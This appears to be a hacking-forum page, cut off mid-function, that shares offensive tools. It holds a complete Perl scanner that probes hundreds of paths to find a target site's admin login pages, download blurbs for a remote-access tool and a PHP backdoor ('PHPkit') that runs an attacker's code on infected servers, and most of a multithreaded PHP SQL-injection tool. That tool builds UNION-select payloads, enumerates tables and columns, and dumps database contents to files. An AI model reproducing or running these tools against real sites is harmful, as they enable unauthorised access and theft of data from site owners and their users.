Raptor87

Sigur frate, d?-i drumul multumesc pentru feedback-ul

#!/usr/bin/perl ## # By Tartou2 # Admin Control Panel Finder # Home: www.next-next-future.com ## use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Admin Control Panel Finder Coded by Tartou2 from www.next-next-future.com'); print"\n"; print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ; print " Admin Control Panel Finder v 1 \n" ; print " Coded By Tartou2\n" ; print " website:www.next-next-future.com\n\n" ; print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ; print "\n"; print " Enter the website you want to scan \n"; print" e.g.: www.domaine.com or www.domaine.com/path\n"; print" --> "; $site=<STDIN>; chomp $site; print "\n\n"; print " Enter the coding language of the website \n"; print" e.g.: asp, php, cfm, any\n"; print" If you don't know the launguage used in the coding then simply type ** any ** \n"; print"--> "; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n"; print "->The website: $site\n"; print "->Source of the website: $code\n"; print "->Scan of the admin control panel is progressing...\n\n\n"; if($code eq "asp"){ @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # -------------------test cfm ---------------------------| # ------------------------------------------------------- if($code eq "cfm"){ @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- #--------------------------/test-------------------------| # ------------------------------------------------------- if($code eq "php"){ @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' ); foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # ----------------------- any ---------------------------| # ------------------------------------------------------- if($code eq "any"){ @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php','admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php','admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php','admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php','admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php','admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php','admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/','adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php','admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm','administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/','administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php','administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/','adminLogin.asp','admin-login.asp','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/','adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/','bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php','bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp','cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/','fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/','login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/','modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php','moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php','myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/','panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php','pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login.php','rcLogin/','Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php','smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/','ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/','webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php','wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; }else{ print "[-] Not Found <- $final\n"; } } kill("STOP",NULL); } ## Source www.next-next-future.com

Brynhildr is a handy and reliable software that helps you to easily connect to a computer by specifying the IP address and the port number. The aforementioned application provides you with both server and client tools and allows you to remotely connect to any PC in just a few seconds. It handles clipboard forwarding and voice transmission. Download: http://blog.x-row.net/download/brynhildr.php?file=0997 Source: http://trojanforge.com Credit: rnk

Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. Changes : The UI and modules of the project have been re-written. The interactive mode is now more verbose. The (static) malware analysis module has been enhanced. Bug fixes and other improvements. Download: Download: Hook Analyser Malware Tool 2.2 ? Packet Storm Source And New Version Download: Hook Analyser

PHPkit is a simple PHP based backdoor, leveraging include() and php://input to allow the attacker to execute arbitrary PHP code on the infected server. The actual backdoor contains no suspicious calls such as eval() or system(), as the PHP code is executed in memory by include(). Systems | unix Download: Download: PHP Kit 1.0 ? Packet Storm Source: PHP Kit 1.0 ? Packet Storm

This is a SQL injection tool similar to havij but is super fast per the author. Authored by:miyachung Systems | unix <?php /************************************************************************* . __ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ -------------------------------------------------------------------------- * Multithreaded SQL Injector * Coded by Miyachung * Miyachung@hotmail.com * Special Thanks burtay * Janissaries.Org * Youtube Channel -> http://www.youtube.com/JanissariesOrg * Usage -> https://www.youtube.com/watch?v=pytxxNnDWEU * Dump show -> https://www.youtube.com/watch?v=TvCvtgKn6Rg ***************************************************************************/ set_time_limit(0); if(!is_dir("dumps")){mkdir("dumps");} echo "[+]Enter website: "; $site = fgets(STDIN); $site = str_replace("\r\n","",$site); $site = trim($site); if(!$site) exit("\n[-]Where is the website!"); if(!preg_match('#http#',$site)) $site = "http://".$site; echo "[+]Enter column number: "; $colons = fgets(STDIN); $colons = str_replace("\r\n","",$colons); $colons = trim($colons); if(!$colons) exit("\n[-]Where is the columns!"); echo "[+]Enter effected column: "; $effected = fgets(STDIN); $effected = str_replace("\r\n","",$effected); $effected = trim($effected); if(!$effected) exit("\n[-]Where is the effected column!"); echo "[+]Advanced SQL Injecter\n"; echo "[+]Coded by Miyachung || Janissaries.Org\n"; $version_url = __make_SQL_URL($site,$colons, $effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version ()"); $version_page = fetch($version_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$version_page)) { exit("[-]Fail -> 403 Forbidden\n"); } $version_page = __replace($version_page); if(preg_match('#<v3rsion>#si',$version_page)) { preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version); echo "[+]Version -> ".strip_tags($version[1])."\n"; } else { exit("[-]Version not found\n"); } $database_url = __make_SQL_URL($site,$colons, $effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database ()"); $database_page = fetch($database_url); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page)) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$database_page)) { exit("[-]Fail -> 403 Forbidden\n"); } $database_page = __replace($database_page); if(preg_match('#<d4tabase>#si',$database_page)) { preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database); echo "[+]Database -> ".strip_tags($database[1])."\n"; } else { echo "[-]Database not found\n"; } if(substr($version[1],0,1) == 5) { echo "[+]Version >= 5 getting tables,using information_schema.tables\n"; }else{exit("[-]Version < 5 , sorry can't get the tables");} $table_counturl = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode ("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)"); $table_countpage = fetch($table_counturl); $table_countpage = __replace($table_countpage); preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted); if($table_counted[1] == null) { exit("[-]Tables not found\n"); } echo "[+]Total tables -> ".$table_counted[1]."\n"; for($xz=0;$xz<$table_counted[1];$xz++) { $table_url[] = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode ("<t4bles>"),__hexEncode("</t4bles>"),"table_name"); // $table_page = fetch($table_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$table_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $table_page = __replace($table_page); // preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables); // $tbls[] = strip_tags(trim($tables[1])); } $tbls = __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE); table_again: echo "\n"; $tbls = array_values(array_unique(array_filter($tbls))); if(empty($tbls)) { exit("[-]Can't get tables\n"); } foreach($tbls as $tid => $tbl) { echo "[$tid]$tbl\n"; } echo "\n[+]Choose a table for get columns,just type number (exit): "; $choose = fgets(STDIN); $choose = str_replace("\r\n","",$choose); $choose = trim($choose); if($choose == "exit") { exit("\n"); } $selected = $tbls[$choose]; $column_counturl = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.columns+where+table_name=0x".__hexEncode ($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</ c0lumnscount>"),"count(column_name)"); $column_countpage = fetch($column_counturl); $column_countpage = __replace($column_countpage); preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage, $column_counted); if($column_counted[1] == null || $column_counted[1] == 0) { echo "[-]Columns not found\n"; goto table_again; } echo "[+]Total columns for $selected -> ".$column_counted[1]."\n"; for($xc=0;$xc<$column_counted[1];$xc++) { $column_url[] = __make_SQL_URL($site,$colons,$effected,"+from +information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE, $xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name"); // $column_page = fetch($column_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$column_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $column_page = __replace($column_page); // preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns); // $cols[] = strip_tags(trim($columns[1])); } $cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE); col_showagain: echo "\n"; $cols = array_values(array_unique(array_filter($cols))); foreach($cols as $cid => $colname) { echo "[$cid]$colname\n"; } what_again: echo "\n[+]What do you wanna do (dump,back,exit): "; $whatdo = fgets(STDIN); $whatdo = str_replace("\r\n","",$whatdo); $whatdo = trim($whatdo); if($whatdo == "dump") { col_ask: echo "[+]Select dump column 1,just type number(back,exit): "; $select_col1 = fgets(STDIN); $select_col1 = str_replace("\r\n","",$select_col1); $select_col1 = trim($select_col1); if($select_col1 == "back") { goto col_showagain; } elseif($select_col1 == "exit") { exit("\n"); } echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): "; $select_col2 = fgets(STDIN); $select_col2 = str_replace("\r\n","",$select_col2); $select_col2 = trim($select_col2); if($select_col2 == "back") { goto col_ask; } elseif($select_col2 == "exit") { exit("\n"); } elseif(!empty($select_col2)) { $column2 = $cols[$select_col2]; } $column1 = $cols[$select_col1]; $count_url = __make_SQL_URL($site,$colons,$effected,"+from+ $selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count ($column1)"); $count_page = fetch($count_url); $count_page = __replace($count_page); preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount); if(trim($datacount[1]) == null || $datacount[1] == 0) { echo "[-]Columns empty\n"; goto col_showagain; } echo "[+]Total datas -> ".$datacount[1]."\n"; echo "[+]Using LIMIT NULL,1 for dump\n\n"; for($x=0;$x<=$datacount[1];$x++) { if($column2) { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE, $x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2"); $filename = "dumps/".__parse($site).",$column1"."_"."$column2.txt"; } else { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE, $x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1"); $filename = "dumps/".__parse($site).",$column1.txt"; } // $dump_page = fetch($dump_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$dump_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $dump_page = __replace($dump_page); // if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps)) // { // $dump = $dumps[1]; // echo strip_tags(trim("[$x]$dump"))."\n"; // ob_flush();flush(); // __dumpsave($filename,$dump."\r\n"); // } } if($datacount[1] >= 20) { $dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE, $filename); } else { $dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,""); } unset($column_url); unset($dump_url); goto col_showagain; } elseif($whatdo == "back") { unset($column_url); unset($cols); goto table_again; } elseif($whatdo == "exit") { exit("\n"); } else { echo "[-]Unknown command\n"; goto what_again; } function fetch($url) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_TIMEOUT,10); $oba = curl_exec($curl); return $oba; } function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2, $what) { $colon_union = range(1,$colons); if($concat) { $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)"; } else { $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)"; } $colon_union = implode(",",$colon_union); if($from) { if($limit != null) { $url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+ $limit,1--"; }else { $url = $site."+and+1=0+union+select+".$colon_union.$from."--"; } }else{ if($limit != null) { $url = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--"; } $url = $site."+and+1=0+union+select+".$colon_union."--"; } return $url; } function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL) { $init = curl_multi_init(); $urls = array_chunk($urls,$thread); $x = 0; foreach($urls as $url) { for($i=0;$i<=count($url)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,$url[$i]); curl_setopt($curl[$i],CURLOPT_TIMEOUT,10); 